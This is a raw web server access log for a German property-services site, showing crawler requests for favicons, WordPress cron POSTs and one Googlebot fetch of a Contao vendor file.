66.249.66.0 - - [10/Mar/2025:08:48:33 +0100] "GET /contao/vendor/symfony/debug-bundle/DependencyInjection/Compiler/DumpDataCollectorPass.php HTTP/1.1" 500 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.6943.141 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:49:31 +0100] "POST /wp-cron.php?doing_wp_cron=1741592970.9790151119232177734375 HTTP/1.1" 200 - "-" "zZzjx3kC680a"
74.80.208.0 - - [10/Mar/2025:08:49:30 +0100] "GET /newsletter/favicon/favicon-120.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:50:20 +0100] "POST /wp-cron.php?doing_wp_cron=1741593020.6667399406433105468750 HTTP/1.1" 200 - "-" "zroxQdJQQb1Q"
74.80.208.0 - - [10/Mar/2025:08:50:20 +0100] "GET /prjekte/objektwartung-in-immobilien-durch-den-objektservice/favicon/favicon-152.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
74.80.208.0 - - [10/Mar/2025:08:50:33 +0100] "GET /objektwartung/favicon/favicon-60.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:51:06 +0100] "POST /wp-cron.php?doing_wp_cron=1741593066.3024139404296875000000 HTTP/1.1" 200 - "-" "V0uSWavS8Xc8"
74.80.208.0 - - [10/Mar/2025:08:51:06 +0100] "GET /einbruchschutz/favicon/favicon-152.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
185.189.182.0 - - [10/Mar/2025:08:52:34 +0100] "GET / HTTP/1.0" 400 362 "-" "-"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:53:53 +0100] "POST /wp-cron.php?doing_wp_cron=1741593233.4119160175323486328125 HTTP/1.1" 200 - "-" "7IlfEgqaTfcU"
74.80.208.0 - - [10/Mar/2025:08:53:53 +0100] "GET /vogel-taubenabwehr/favicon/favicon-57.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:54:14 +0100] "POST /wp-cron.php?doing_wp_cron=1741593254.0212750434875488281250 HTTP/1.1" 200 - "-" "6id1NNOyRQP0"
74.80.208.0 - - [10/Mar/2025:08:54:13 +0100] "GET /brandschutz/favicon/favicon-57.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
74.80.208.0 - - [10/Mar/2025:08:54:57 +0100] "GET /brandschutz/favicon/favicon-114.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
2a01:238:43f8:5f00:: - - [10/Mar/2025:08:55:45 +0100] "POST /wp-cron.php?doing_wp_cron=1741593345.0034670829772949218750 HTTP/1.1" 200 - "-" "I1wye3Cl9Fp2"
74.80.208.0 - - [10/Mar/2025:08:55:44 +0100] "GET /einbruchschutz/favicon/favicon-72.png HTTP/2.0" 200 48509 "-" "Mozilla/5.0 (compatible; ImagesiftBot; +imagesift.com)"
